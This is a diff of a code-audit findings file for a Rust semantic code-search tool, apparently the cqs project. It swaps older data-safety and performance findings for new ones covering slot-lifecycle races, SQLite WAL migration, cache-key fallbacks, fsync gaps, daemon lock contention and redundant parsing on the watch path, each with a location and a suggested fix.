-- **Description:** The `migrate_v18_to_v19` function does (in order inside the tx): CREATE sparse_vectors_v19, INSERT...SELECT from sparse_vectors INNER JOIN chunks (drops orphans), DROP INDEX idx_sparse_token, DROP TABLE sparse_vectors, ALTER TABLE RENAME to sparse_vectors, CREATE INDEX idx_sparse_token, bump splade_generation. Then at `run_migration_tx` line 197-203 the caller UPSERTs schema_version. These are all in one tx, so SQLite rollback-on-error is safe per-SQLite. But the v18→v19 migration is destructive: it PERMANENTLY drops orphan sparse_vectors rows as part of the copy (the INNER JOIN filter at line 508). If the migration fails AFTER the INSERT step (say, during the ALTER TABLE RENAME or the CREATE INDEX), the rollback correctly reverts everything — but the filesystem backup at `src/store/backup.rs:107` taken before the migration is the only recovery path. If that backup step itself silently failed (because `CQS_MIGRATE_REQUIRE_BACKUP` is not set, which is the default), the log says "Migration backup failed; proceeding without snapshot" and then the migration proceeds. A subsequent non-transactional error — e.g. a commit-time IO failure that SQLite can't fully reverse — leaves the user with a partially-migrated DB and no backup to restore from. The happy-path case is fine; the no-backup + non-transactional-commit-failure case is catastrophic.
-- **Suggested fix:** Flip the default: `CQS_MIGRATE_REQUIRE_BACKUP` should default to `1`, not `0`. The current default ("proceed without snapshot") is the correct choice only for users on filesystem-full scenarios; for everyone else, a backup failure is a signal to abort before doing anything destructive. Alternative: add a pre-migration `SELECT COUNT(*) FROM sparse_vectors` vs `SELECT COUNT(*) FROM sparse_vectors_v19` assertion that refuses to DROP the old table if the INSERT filter removed rows we weren't expecting to lose. Log a `tracing::error!` and require `CQS_ALLOW_ORPHAN_DROP=1` env to proceed.
-
-#### DS2-9: `upsert_sparse_vectors` drops the secondary `idx_sparse_token` index INSIDE the write tx — a panic after the DROP but before the CREATE leaves the index without the token_id B-tree, killing SPLADE search on reopen
-- **Difficulty:** medium
-- **Location:** `src/store/sparse.rs:113-117` (DROP) + `:193-196` (CREATE INDEX at the end)
-- **Description:** The bulk-load pattern DROP INDEX → INSERT in batches → CREATE INDEX is standard SQLite optimization, and because it's all inside one `begin_write()` transaction, SQLite's rollback semantics correctly revert both the DROP and any INSERT on error. HOWEVER: `sqlx::Transaction` holds an `&mut SqliteConnection`. The inner loop at line 162-177 does `qb.build().execute(&mut *tx).await?` — a network or I/O error on any batch returns early, the `?` propagates, and `tx` is dropped implicitly which triggers a rollback ONLY if the connection is still alive. Under panic unwind (e.g. a downstream `split_at_unchecked` OOB panic when weight is NaN), the rollback also fires via `Drop`. What does NOT fire a rollback: if `upsert_sparse_vectors` itself is canceled asynchronously (e.g. the tokio runtime dropped by CTRL-C while this function is mid-transaction under `rt.block_on`). `block_on` is synchronous, so `Drop::drop(tx)` runs, and SQLite should roll back — so this is actually safe in principle. But the failure mode I'm worried about: if the process is SIGKILLed while the tx is open, SQLite's WAL recovery on next open will see the uncommitted INSERTs as unreachable in the WAL and discard them — the DDL (DROP INDEX / CREATE INDEX) that SQLite treats as a schema-altering operation likewise rolls back via WAL. Net: safe under kill-9. The real concern is more subtle: if an admin `kill -9`s the process after the transaction committed BUT BEFORE the CREATE INDEX statement fired (impossible in practice because they're both in the same tx, but I'm exhaustively exercising the concern) — OK, this case cannot happen. The legitimate residual issue: if the bulk insert fails and returns early, the transaction rolls back, but `bump_splade_generation_tx` at line 202 was also rolled back. Net: no generation bump means the on-disk `splade.index.bin` from a prior run is still trusted, while `sparse_vectors` rows were never added. Readers see stale SPLADE results until the next successful upsert bumps the counter.
-- **Suggested fix:** On `upsert_sparse_vectors` error, call `bump_splade_generation` (a standalone function, NOT inside any tx) to force invalidation of the on-disk file that could now be out-of-step with a rollback. This converts "rollback + stale on-disk file" into "rollback + regenerated on-disk file," which is the correct invalidation direction. Add the cleanup to the error path of the function itself, outside `self.rt.block_on(async { ... })`.
-
-#### DS2-10: `as_millis() as i64` mtime cast silently truncates — if a user's system clock jumps ~292 million years forward or if a pathological filesystem returns mtime beyond `i64::MAX` milliseconds, comparisons against stored_mtime wrap silently and flag fresh files as stale
+#### `slot_remove` race: read active_slot → list_slots → remove_dir_all is TOCTOU on concurrent promote
 - **Difficulty:** easy
-- **Location:** `src/cli/watch.rs:2556`, `src/lib.rs:454`, `src/store/chunks/staleness.rs:511,601,674,834,879,1332,1395`, `src/store/notes.rs:150,354`
-- **Description:** `Duration::as_millis()` returns `u128`. The cast `as i64` silently wraps when the value exceeds `i64::MAX` (year 2262-ish) — for realistic wall clock this is never a concern. The real concern is pathological mtime values: a filesystem bug (ZFS snapshot with a bad atime, a clock-jumped VM that briefly set mtime in the far future, WSL 9P's notorious mtime clamping) can return mtimes that survive `duration_since(UNIX_EPOCH)` as a positive `Duration` but overflow `i64::MAX` on the cast. The store compares these as `i64` in `needs_reindex`, `list_stale_files`, `check_origins_stale`, `notes_need_reindex`. A silently-wrapped negative `i64` compares as LESS than any legitimate stored_mtime, which means: (a) `needs_reindex` returns `Some(wrapped_neg_mtime)` because `stored_mtime >= current` is false, triggering a wasteful reindex — benign but noisy; (b) `list_stale_files` puts the file in `stale` because `current > stored` — also benign; (c) `notes_need_reindex` matches the else arm and returns a wrapped `current_mtime` that gets WRITTEN into the `notes.file_mtime` column as a negative i64, permanently polluting the DB until manual cleanup.
-- **Suggested fix:** Replace the 13 sites with a shared helper `fn duration_to_mtime_millis(d: Duration) -> i64 { i64::try_from(d.as_millis()).unwrap_or(i64::MAX) }`. Saturating semantics match the "future time is still fresh" invariant, and the one-site-changes-all-callers pattern prevents drift. Defensive but cheap; also makes the cast intent explicit.
+- **Location:** `src/cli/commands/infra/slot.rs:299-350`
+- **Description:** `slot_remove` reads `active_slot` (line 312), reads `list_slots` (line 313), then `fs::remove_dir_all(&dir)` (line 335). Between any two of those steps a concurrent `cqs slot promote` (or another `slot remove`) can mutate `.cqs/active_slot`. Trigger sequence:
+  1. Process A enters `slot_remove("foo", force=false)`. `foo` is NOT the active slot per its read at line 312 — read says active is "default".
+  2. Process B runs `cqs slot promote foo`, atomically rewriting `active_slot` to "foo".
+  3. Process A proceeds past the active-slot guard (line 316) since its snapshot says active="default", and runs `fs::remove_dir_all(slot_dir(... "foo"))`.
+  4. The system is now pointing `active_slot` at a slot directory that no longer exists. Subsequent commands hit `SlotError::Empty("foo")` until the user manually runs `cqs slot promote default`.
+  Same race with two concurrent `slot_remove` calls competing to remove the only remaining slot. There is no file lock around `.cqs/slots/` lifecycle — `slot_dir` operations rely on plain filesystem semantics.
+- **Suggested fix:** Take an exclusive lock on a `.cqs/slots.lock` file at the top of every `slot_*` operation (mirroring the `notes.toml.lock` pattern in `src/note.rs:209-228`). Hold it for the entire read-validate-mutate sequence. Same pattern in `slot_promote` and `slot_create`.
 
-Summary: 10 actionable findings covering schema migration risk (DS2-8), TOCTOU in GC paths (DS2-1, DS2-2), torn writes from WRITE_LOCK bypass (DS2-3), atomicity gaps across multi-step watch reindex (DS2-4), cache evict race (DS2-5), HNSW parent-dir fsync gaps (DS2-6), HNSW/SQLite dirty-flag state drift (DS2-7), SPLADE generation bump rollback (DS2-9), and mtime cast truncation (DS2-10). The SPLADE/HNSW/chunks atomicity invariant is strong where the prior audits fixed it (`prune_all`, `set_hnsw_dirty`, `upsert_sparse_vectors`) but the fixes didn't propagate uniformly — two sibling prune functions and two metadata setters still run outside the `WRITE_LOCK` discipline.
+#### Slot legacy migration moves live `index.db-wal` / `-shm` instead of checkpointing first
+- **Difficulty:** medium
+- **Location:** `src/slot/mod.rs:511-624`
+- **Description:** `migrate_legacy_index_to_default_slot` runs idempotently on every `Store::open`. If a legacy `.cqs/index.db` is present and `.cqs/slots/` is absent, it moves `index.db`, `index.db-wal`, and `index.db-shm` (alongside HNSW + SPLADE files) into `.cqs/slots/default/`. But `index.db-wal` may contain uncommitted pages from a *prior* daemon run that crashed before checkpointing. SQLite recovers WAL-mode databases by replaying the WAL on next open — but only if the WAL sits next to the DB on the same inode lineage. After the migration moves all three files atomically the WAL replay still works, but if the moves are NON-atomic (cross-device fallback at `move_file:631-637` does `fs::copy + fs::remove_file`), an interrupt between copying `index.db` and copying `index.db-wal` leaves the new `slots/default/index.db` without its WAL. SQLite reopens that DB and silently truncates / discards uncommitted WAL pages — data loss for any writes that were in flight when the crash occurred.
+- **Suggested fix:** Before the migration, open the legacy `index.db` once with `PRAGMA wal_checkpoint(TRUNCATE)` so the WAL is drained into the main file and the sidecars are empty/absent. Only then move files. This makes the multi-file move's failure modes recoverable: the worst case is a partially-moved index.db, which on restart is detected by the legacy path still existing.
 
----
+#### `model_fingerprint` fallback uses Unix timestamp — every restart misses cache, breaks cross-slot copy invariant
+- **Difficulty:** medium
+- **Location:** `src/embedder/mod.rs:435-465`
+- **Description:** `model_fingerprint()` is the cache key for the cross-slot embeddings cache (per memory: "cross-slot copy by content_hash before A/B reindex saves ~$1-5 in API spend"). The fingerprint is normally a blake3 of the ONNX file. But four error branches fall back to `format!("{}:{}", self.model_config.repo, ts)` where `ts = SystemTime::now()`. Every process restart that hits a fallback writes cache rows under a NEW timestamp, and subsequent reads with a different timestamp miss them. Worse, the cache `(content_hash, model_fingerprint)` PRIMARY KEY treats different timestamps as different models — cross-slot copy by `content_hash` would silently match WRONG embeddings if two slots happened to use the timestamp fallback at different moments (the timestamp fallback for both slots gives different fingerprints, so the cross-slot copy queries would miss the cache entirely; even more concerning is that the fingerprint is used as cache identity across writes, so every fallback embedding becomes orphan, accumulating). The fingerprint is also used in PRAGMA-style metadata records — a stale fingerprint stored in `metadata.embedding_model_fp` will never match a cache write made under the current timestamp.
+- **Suggested fix:** Make the fallback deterministic: `format!("{}:fallback:size={}", repo, file_size_or_zero)` with NO time component. A fallback fingerprint that's stable across restarts is strictly better than a "unique" fallback that fragments the cache. Log loudly at `warn!` so users notice the missing-file path was taken; failing the embedder open is a defensible alternative.
+
+#### `write_slot_model` and `write_active_slot` skip parent-dir fsync after rename
+- **Difficulty:** easy
+- **Location:** `src/slot/mod.rs:237-277` (`write_slot_model`), `src/slot/mod.rs:363-406` (`write_active_slot`)
+- **Description:** Both functions write to a temp file, fsync the file (only `write_active_slot` does this — `write_slot_model` only `f.sync_all()`s; both do), then `fs::rename`. Neither fsyncs the parent directory after the rename. On power loss between rename and the next inode/dirent flush, the rename can be lost (returning the user to the previous active_slot or a missing slot.toml). `src/note.rs:304` and `src/audit.rs:149` correctly use `crate::fs::atomic_replace`, which fsyncs both file AND parent dir. The slot writers are the odd ones out — same code shape, weaker guarantees. For `active_slot`, this matters because a `cqs slot promote foo` followed by a power cut can crash the system into seeing the OLD slot active even though `cqs slot promote` returned success — the user re-runs commands assuming the new slot, gets stale results.
+- **Suggested fix:** Replace the bespoke temp+rename in `write_slot_model` and `write_active_slot` with a call to `crate::fs::atomic_replace` (the helper already exists for `notes.toml` and `audit-mode.json`). Removes ~20 lines from each function and gives durable rename semantics.
+
+#### Daemon serializes ALL queries through one `Mutex<BatchContext>` — a slow query (LLM batch fetch, large gather) blocks every other reader
+- **Difficulty:** medium
+- **Location:** `src/cli/watch.rs:1775` (mutex setup), `src/cli/watch.rs:1853-1858` (per-connection thread that takes the mutex)
+- **Description:** `cqs watch --serve` wraps the BatchContext in `Arc<Mutex<...>>` and per-connection threads acquire it for the entire `handle_socket_client` dispatch (line 1856 → `handle_socket_client(stream, &ctx_clone)`). All `cqs <cmd>` invocations from the user's shell — search, callers, scout, gather, even `notes list` — block on this single mutex. A slow path (e.g. `cqs llm summary --batch ...` triggering a Claude Batch poll, or a `cqs gather` BFS over a hostile-shape graph that takes 30+ seconds) blocks every other CLI invocation including `cqs --version` if it goes through the daemon. From a data-safety angle the issue is that with the mutex held, any background job that needs to *write* (like `stream_summary_writer` callbacks fired from a parallel LLM thread inside the BatchContext) waits behind reads. With `WRITE_LOCK` held inside the mutex while the daemon's outer mutex is also waiting, a deadlock surface emerges: thread A holds outer mutex + WRITE_LOCK, thread B (LLM stream) wants WRITE_LOCK but can't proceed; if thread A's transaction is waiting on a rayon pool that thread B's host thread serves, A and B both stall.
+- **Suggested fix:** Two options that match the project's conventions:
+  1. Replace the outer `Mutex<BatchContext>` with `RwLock<BatchContext>`; reader paths take `read()`, the few mutator paths (sweep_idle_sessions, reload notes) take `write()`. Lets concurrent reads parallelize.
+  2. Push the mutex inside `BatchContext` to per-resource locks (one for sessions, one for notes cache, etc.) and reach in only for the specific field a query needs.
+  Either way, audit `stream_summary_writer` carefully — it must NOT be reachable from inside the daemon mutex without going through the `WRITE_LOCK` discipline.
+
+#### `embedding_cache` schema is identical for both `embedding` and `embedding_base` columns — no separation by purpose
+- **Difficulty:** medium
+- **Location:** `src/cache.rs:159-171` (schema), `src/store/chunks/async_helpers.rs:319` (writes)
+- **Description:** The cache stores `(content_hash, model_fingerprint) → embedding`. v18 added `embedding_base` (raw NL embedding before enrichment) but the cache schema does not record WHICH of the two dual-index columns the cached blob represents. The cache is read at the top of every embed batch (in `Embedder::embed_batch_with_cache` or similar) — if the lookup is for "embedding" but the row was written for "embedding_base" (or vice versa), the wrong vector is returned. In practice today both columns are seeded identically on the initial insert (line 319), so it works; but PR #1040's enrichment pass overwrites `embedding` only, leaving `embedding_base` intact. The next reindex hits the cache by content_hash + fingerprint and gets back... whichever row was written last. There's no `purpose` discriminator. If a future change ever caches the post-enrichment embedding, the cache becomes non-deterministic between purposes.
+- **Suggested fix:** Add a `purpose TEXT NOT NULL DEFAULT 'embedding'` column to the cache schema, include it in the PRIMARY KEY and all reads/writes. Costs one migration and one extra bind per query; eliminates the implicit assumption that the same content_hash + fingerprint can only have one meaning.
+
+#### `update_umap_coords_batch` uses TEMP TABLE shared across concurrent calls — DELETE may clear another session's data mid-flight
+- **Difficulty:** easy
+- **Location:** `src/store/chunks/crud.rs:392-450`
+- **Description:** Inside the write transaction, the function does `CREATE TEMP TABLE IF NOT EXISTS _update_umap (...)` then `DELETE FROM _update_umap` (line 401-403). TEMP tables in SQLite are *connection-scoped*, not transaction-scoped: they persist across statements on the same connection. Because the sqlx pool may hand out the same connection to a future `update_umap_coords_batch` call, the second call's `DELETE FROM _update_umap` sees rows from the first call's TEMP table (or the table simply persists across multiple invocations until the connection is dropped). Today this is masked because `WRITE_LOCK` serializes calls. But if a concurrent error path leaves the table populated (e.g. `INSERT INTO _update_umap` succeeds, then the `UPDATE chunks ... FROM _update_umap` fails and the transaction rolls back), the CREATE IF NOT EXISTS sees the leftover, and DELETE clears it — but a DROP TABLE IF EXISTS at the end of the function (line 435-437) is INSIDE the transaction that was just rolled back, so the leftover survives. The next call's INSERT-then-UPDATE then operates on the right shape but the TEMP TABLE is now persistently dirty.
+- **Suggested fix:** Either (a) DROP the TEMP TABLE before CREATE so each call starts clean, regardless of prior state; or (b) use a uniquely-named TEMP TABLE (suffix with random u64) and DROP at end-of-function via a Drop guard so failures still clean up. Option (a) is simpler; SQLite TEMP DROP is cheap and the error path is the rare case.
+
+#### Cache `evict()` size-then-DELETE is in a transaction but the per-row `write_batch()` it competes with is NOT under the same lock
+- **Difficulty:** medium
+- **Location:** `src/cache.rs:408-460` (evict tx with `evict_lock`), `src/cache.rs:354-398` (`write_batch` tx, no `evict_lock`)
+- **Description:** The DS2-5 fix moved the `(SELECT size, AVG, DELETE)` triplet inside one transaction with an in-process `evict_lock` mutex serializing concurrent evicts. Good. But `write_batch` runs in its own transaction without acquiring `evict_lock`. Under WAL mode the evict's BEGIN takes a snapshot at evict-start; a concurrent `write_batch` can commit AFTER the SELECT-size step but BEFORE the DELETE step. The evict's DELETE then deletes some rows just inserted, with no signal to the writer. From the writer's perspective, the embedding write succeeded; from a cross-session read it's a cache miss, and the next embed pass repeats the (potentially expensive) embedding computation. Not corruption — but a confusing perf footgun.
+- **Suggested fix:** Hold `evict_lock` (or the Tokio equivalent) across writes too — every cache mutation goes through one of the two paths, both acquire the same mutex. Costs a per-batch lock acquire (cheap) and eliminates the silent re-embed loop.
+
 
 ## Performance
 
-#### [PF-V1.29-1]: Daemon request path shell-joins and re-splits args on every query
+#### [PF-V1.30-1]: `reindex_files` watch path double-parses calls per file (parse_file_all then extract_calls_from_chunk per chunk)
 - **Difficulty:** medium
-- **Location:** `src/cli/watch.rs:315-331`
-- **Description:** For every daemon socket query, `handle_socket_client` extracts `command: String` and `args: Vec<String>` from the JSON request (`src/cli/watch.rs:229-270`), then reconstructs a single string via `format!("{} {}", command, shell_words::join(&args))` and passes it to `BatchContext::dispatch_line`, which immediately re-splits it with `shell_words::split` (`src/cli/batch/mod.rs:563`). This is a pure waste on the hot daemon path — every query pays: (1) `shell_words::join` (quoting + escape pass, allocates per arg), (2) `format!` allocation of the assembled line, (3) `shell_words::split` on the daemon side (another allocation + tokenization pass), (4) both paths validate NUL bytes on the same data. For agents firing 100+ queries per task, this is hundreds of redundant String allocations and two full passes over the tokens. The Vec<String> that arrives already has the shape `BatchInput::try_parse_from(&tokens)` expects.
-- **Suggested fix:** Add a `dispatch_tokens(&self, tokens: &[String], out: &mut impl Write)` method on `BatchContext` that takes already-parsed tokens directly. `handle_socket_client` prepends `command` to `args` (or uses `std::iter::once(command).chain(args.iter())`) and calls `dispatch_tokens`. `dispatch_line` can keep its shell parsing path for the `cqs batch` stdin surface but skips the round-trip for daemon queries. Also eliminates one of two `reject_null_tokens` checks since the JSON parser's string validation already covers NUL bytes on the socket path.
+- **Location:** `src/cli/watch.rs:2815, 2930-2939`
+- **Description:** The watch reindex calls `parser.parse_file_all(&abs_path)` at line 2815 — this returns `(file_chunks, calls, chunk_type_refs)`, where `calls` is the file-level call graph. The `calls` value is upserted at line 2851 via `store.upsert_function_calls`, then **silently discarded for chunk-level call mapping**. Lines 2930-2939 then loop every chunk and call `parser.extract_calls_from_chunk(chunk)` — which re-runs tree-sitter over the chunk content to extract the same call sites a second time. The bulk pipeline already fixed this in P2 #63 by using `parse_file_all_with_chunk_calls` (returns a fourth `chunk_calls: Vec<(chunk_id, CallSite)>` value from the same Pass 2). The docstring at `src/parser/mod.rs:447-451` explicitly notes "Watch (`src/cli/watch.rs`) still uses `parse_file_all` and runs its own `extract_calls_from_chunk` per chunk; collapsing that into this method is a separate refactor." That refactor never landed. With ~14k chunks per repo-wide reindex (parser.rs note) and one tree-sitter parse per chunk, this is an extra 14k tree-sitter parses per `cqs index` (when the daemon is the indexer) or per touched file's chunks per watch event.
+- **Suggested fix:** Switch the watch path from `parse_file_all` to `parse_file_all_with_chunk_calls`. The fourth tuple element is `Vec<(String, CallSite)>` keyed by absolute-path chunk id; rewrite the ids using the same prefix-strip the watch path already does for `chunk.id` at line 2834, then replace the `for chunk in &chunks { extract_calls_from_chunk(chunk) }` loop with a `HashMap` populated from the returned chunk_calls. Single-line API switch + ~10 lines of id rewriting; cuts reindex CPU roughly in half on the watch path.
 
-#### [PF-V1.29-2]: `fetch_chunks_by_ids_async` and `fetch_candidates_by_ids_async` hardcode BATCH_SIZE=500, ignore modern SQLite limit
-- **Difficulty:** easy
-- **Location:** `src/store/chunks/async_helpers.rs:27, 69` (both functions)
-- **Description:** Both fetch helpers hardcode `const BATCH_SIZE: usize = 500` with comments claiming "SQLite's 999-parameter limit". That limit was raised to 32766 in SQLite 3.32 (2020). The rest of the codebase (`src/store/calls/query.rs:204`, `src/store/types.rs:18`, `src/store/sparse.rs:123`, `src/store/calls/crud.rs:32,81,115,217,283,313`) already uses `crate::store::helpers::sql::max_rows_per_statement(1)` which returns ~32466. These are called from every search: `search_by_candidate_ids_with_notes` → `fetch_candidates_by_ids_async` (line 860 of search/query.rs) and `finalize_results` → `fetch_chunks_by_ids_async` (line 412 of search/query.rs). On wide queries (e.g. `cqs search "X" --limit 100 --rerank` which pools to `limit * 3 = 300`), each call fits in one statement anyway — but the `cqs context` batch fetch (same helper) routinely hits 1000+ IDs and pays 2-3× the round trips.
-- **Suggested fix:** Replace the two hardcoded `BATCH_SIZE = 500` with `max_rows_per_statement(1)`. Drop the stale "999-param limit" comment. Same one-line change the other modules already made.
-
-#### [PF-V1.29-3]: `get_type_users_batch` and `get_types_used_by_batch` hardcode BATCH_SIZE=200 — impact analysis pays 3× latency
-- **Difficulty:** easy
-- **Location:** `src/store/types.rs:392, 438`
-- **Description:** Both batch type-edge queries declare `const BATCH_SIZE: usize = 200`. On `cqs impact` for a function that uses 500+ types (common for Rust code — every `HashMap`, `Vec`, `Result`, custom struct counts), `find_type_impacted` at `src/impact/analysis.rs:450` drives 3+ SQL round trips per impact call when one would suffice. Each SQL JOIN (type_edges→chunks) also reloads the full chunk row. Adjacent batch functions in the same file switched to `max_rows_per_statement()` three versions ago; these two slipped through.
-- **Suggested fix:** Replace both constants with `max_rows_per_statement(1)` (one bind per row). Already imported at `src/store/types.rs:18`. Single-line change per function.
-
-#### [PF-V1.29-4]: `find_hotspots` allocates String for every callee in the graph before truncating
-- **Difficulty:** easy
-- **Location:** `src/impact/hints.rs:261-271`
-- **Description:** `find_hotspots(graph, top_n)` iterates `graph.reverse.iter()`, calls `name.to_string()` on every entry to build a `Hotspot { name, caller_count }`, sorts the full Vec, then truncates to `top_n`. `graph.reverse` keys are `Arc<str>` (`src/store/calls/query.rs:113-117`). On a 15k-chunk codebase with ~5k distinct callees (reality per `cqs health --json`: 1838 for `assert`, 1771 for `assert_eq`, etc.), the function allocates 5k Strings for every call even though callers want `top_n = 5` (health) or `top_n = 20` (suggest). Pattern is O(n) allocations + O(n log n) sort when a bounded-heap + conditional allocation would be O(n log top_n) and `top_n` allocations.
-- **Suggested fix:** Use a `BinaryHeap<(Reverse<usize>, Arc<str>)>` capped at `top_n`, pushing `(reverse.len(), Arc::clone(name))` (Arc clone is refcount bump, not alloc). Drain into `Vec<Hotspot>` at the end with exactly `top_n` `name.to_string()` calls. Cuts allocator churn on the health/suggest hot paths by ~250× for a 5k-callee graph with top_n=20.
-
-#### [PF-V1.29-5]: Parser reads every source file, then unconditionally allocates a full CRLF-replaced copy
-- **Difficulty:** easy
-- **Location:** `src/parser/mod.rs:491`
-- **Description:** `let source = source.replace("\r\n", "\n");` runs for every parsed file regardless of platform or actual CRLF presence. `String::replace` always allocates a fresh String the size of the input. On Linux (the primary development/CI platform) 99%+ of files have no CRLF, yet every parse pays a full-content allocation + memcpy. For the cqs codebase that's 607 files ranging up to 100KB+; on a fresh `cqs index` that's ~50MB of wasted allocations plus the I/O pressure from zeroing the new buffers. `source.contains("\r\n")` is a single linear scan with no allocation — cheap to check before allocating.
-- **Suggested fix:** Guard the replace: `let source = if source.contains("\r\n") { source.replace("\r\n", "\n") } else { source };` Preserves CRLF-normalization semantics for actual CRLF files (Windows-authored docs, some config formats) while eliminating the alloc on the common case. Alternatively, use `memchr`-based scan for the `\r` byte only.
-
-#### [PF-V1.29-6]: `BatchContext::notes()` clones the full notes Vec on every cache hit
+#### [PF-V1.30-2]: `reindex_files` watch path bypasses the global EmbeddingCache (slot/cross-slot benefit lost on file edits)
 - **Difficulty:** medium
-- **Location:** `src/cli/batch/mod.rs:1015-1064`
-- **Description:** `notes()` returns `Vec<cqs::note::Note>` and unconditionally clones the cached Vec on every call (`cached.as_ref()?.clone()` at line 1021 and `result = notes.clone()` at line 1061). For 202 notes (per `cqs health` in this repo), each call clones 202 `Note` structs — each carries `text: String`, `mentions: Vec<String>`, and other owned fields. Callers at `src/cli/batch/handlers/misc.rs:92` (scout), `src/cli/batch/handlers/info.rs:365, 400` (notes list, warnings) only need read access. Compare to sibling `test_chunks()` (line 1101) and `call_graph()` (line 1083) which correctly return `Arc<...>` for cheap O(1) clone. The inline comment at line 1004-1006 about cheap `AuditMode` cloning is correct for audit state but `notes()` is pasted-in and structurally different.
-- **Suggested fix:** Change the cache type from `RefCell<Option<Vec<Note>>>` to `RefCell<Option<Arc<Vec<Note>>>>`. Return `Arc<Vec<Note>>`. Update three call sites (`misc.rs:92`, `info.rs:365, 400`) to match — they currently `&notes` and iterate, trivial change. Saves 202 String allocations × 3 call sites per batch query that touches notes.
+- **Location:** `src/cli/watch.rs:2876-2887` vs `src/cli/pipeline/embedding.rs:39-62`
+- **Description:** PR #1105 added the per-project `.cqs/embeddings_cache.db` keyed by `(content_hash, model_id)` so a chunk re-embedded after a model swap or a new slot can hit cache instead of going through the GPU. The bulk index path (`prepare_for_embedding`) checks both `global_cache.read_batch` and `store.get_embeddings_by_hashes`. The watch reindex hot path (`reindex_files`) at line 2877 only calls `store.get_embeddings_by_hashes(&hashes)` — it never sees `EmbeddingCache`. Net effect: every file change in watch mode goes through the embedder for any chunk whose content_hash isn't in the *current slot's* `chunks.embedding` column, even if the same hash was already computed in another slot or in a prior model that lives in the global cache. The watch loop is the highest-frequency embedder consumer (every file save during active development); missing the global cache here costs the most.
+- **Suggested fix:** Plumb `global_cache: Option<&EmbeddingCache>` through `cmd_watch` → `reindex_files`. Replace lines 2876-2887 with a call to the same `prepare_for_embedding` helper the bulk pipeline uses (it already handles the `global cache → store cache → embed` fallback chain, including the dim mismatch guard). Eliminates the diverging cache-check code and makes the watch path benefit from #1105 the way the bulk path already does.
 
-#### [PF-V1.29-7]: `notes.rs::upsert_notes_batch` runs 3 SQL statements per note in a loop
-- **Difficulty:** medium
-- **Location:** `src/store/notes.rs:76-87` and the inner `insert_note_with_fts` at `src/store/notes.rs:30-58`
-- **Description:** `upsert_notes_batch` loops over notes, calling `insert_note_with_fts` for each. That helper runs 3 statements: INSERT OR REPLACE into `notes` + DELETE from `notes_fts` + INSERT into `notes_fts`. For 200 notes, that's 600 prepared-statement round trips within the transaction. Unlike `upsert_chunks_batch` (which batches into multi-row INSERTs at `src/store/chunks/crud.rs:214`), notes use the per-row path. `replace_notes_for_file` at line 124-128 has the same pattern. Notes are smaller than chunks but the watch loop reindexes notes on every notes.toml edit — with 200+ notes and active note editing during audit sessions, this is ~3000× the round-trip overhead of a batched insert.
-- **Suggested fix:** Follow the `upsert_chunks_batch` pattern — build a `QueryBuilder` that emits `INSERT OR REPLACE INTO notes (...) VALUES (?,?,?), (?,?,?), ...` chunked at `max_rows_per_statement(N)` rows per statement. FTS5 unfortunately doesn't support multi-row INSERT via `QueryBuilder::push_values` as cleanly (FTS5 has virtual-table quirks), but batching the DELETE `WHERE id IN (?,?,?...)` collapses N DELETEs into one, leaving only the per-row INSERT INTO notes_fts.
-
-#### [PF-V1.29-8]: `prune_missing` fires `dunce::canonicalize` syscall per missing-path candidate
-- **Difficulty:** medium
-- **Location:** `src/store/chunks/staleness.rs:27-47` (`origin_exists`) called from `src/store/chunks/staleness.rs:88`
-- **Description:** `prune_missing` enumerates all distinct file origins in the chunks table (often 10k+ on real-world projects), then for each one calls `origin_exists(origin, existing_files, root)`. That function first does a HashSet lookup; on miss it falls through to `dunce::canonicalize(&absolute)`, which is a real filesystem syscall per candidate. On the watch hot path with incremental reindex, this fires every reindex cycle; on the initial `cqs index` it fires for every origin in the DB. If `existing_files` was built with canonicalized paths and chunk origins are stored relative (the common case), *every* origin takes the canonicalize fallback. For 15k chunks and 607 distinct origins (per cqs health) that's 607 extra syscalls per prune. WSL filesystem canonicalize over NTFS mount is notoriously slow (~100µs per call) so this can be 60ms per prune on top of the actual delete cost.
-- **Suggested fix:** Either: (1) normalize `existing_files` to also contain the relative form at build time so the cheap HashSet path always hits; or (2) build a second HashSet of origins that appear in chunks and subtract from `existing_files` via set difference (O(n+m) instead of O(n×syscall)). Or (3) canonicalize origins once at index time and store the canonical form so staleness is a pure HashSet lookup. Option 3 is the cleanest but requires schema touch; option 1 is zero-schema and resolves the WSL hot spot.
-
-#### [PF-V1.29-9]: `suggest_tests` calls `reverse_bfs` inside a loop over callers — O(callers × graph_size)
-- **Difficulty:** hard
-- **Location:** `src/impact/analysis.rs:320-335`
-- **Description:** For every caller in `impact.callers`, `suggest_tests` runs a fresh `reverse_bfs(&graph, &caller.name, DEFAULT_MAX_TEST_SEARCH_DEPTH)` to determine if that caller is reached by any test. The inline comment at line 322-327 acknowledges the concern but justifies it as "caller count is typically small". On a function with 50+ direct callers (typical for utility functions in a 15k-chunk codebase — `find_hotspots` output shows some functions with 1800+ callers), this is 50 graph traversals, each potentially visiting thousands of ancestor nodes up to depth 5. Degrades with codebase size and test-graph connectivity. The comment claims `reverse_bfs_multi_attributed` can't replace it because it attributes to only one source, but a single forward `bfs_from_tests` (starting at test nodes, walking to targets up to MAX_TEST_SEARCH_DEPTH) computes "is X reached by any test?" for every X in one pass.
-- **Suggested fix:** Replace the per-caller BFS with a single pre-computed `reachable_from_tests: HashSet<&str>` — do one forward BFS from each test chunk up to depth N, union the reached sets. Then `is_tested = reachable_from_tests.contains(&caller.name)` is O(1). Reuses the same `graph.forward` adjacency. Cuts `cqs impact --suggest-tests` latency from O(callers × graph) to O(tests + callers). Even on small codebases the computation amortizes; for the cqs self-check with 3531 test chunks, the savings are substantial.
-
-#### [PF-V1.29-10]: `search/query.rs` finalize_results clones sanitized FTS string for no reason
+#### [PF-V1.30-3]: `reindex_files` allocates N empty `Embedding` placeholders then overwrites each
 - **Difficulty:** easy
-- **Location:** `src/search/query.rs:363-369`
-- **Description:** In `finalize_results`:
+- **Location:** `src/cli/watch.rs:2918-2924`
+- **Description:** `let mut embeddings: Vec<Embedding> = vec![Embedding::new(vec![]); chunk_count];` allocates `chunk_count` placeholder `Embedding` structs (each with an empty inner `Vec<f32>`), then immediately overwrites every slot via the cached + new-embedding loops at 2919-2923. Even setting aside the constructor cost, the `Embedding` type holds normalized-state metadata; the placeholders may need `Embedding::try_new(vec![])` validation in a future refactor and silently produce zero-norm vectors today. Allocation pattern is also wasteful — for a 100-file batch with 3000 chunks, that's 3000 `Embedding::new(vec![])` calls with discarded results.
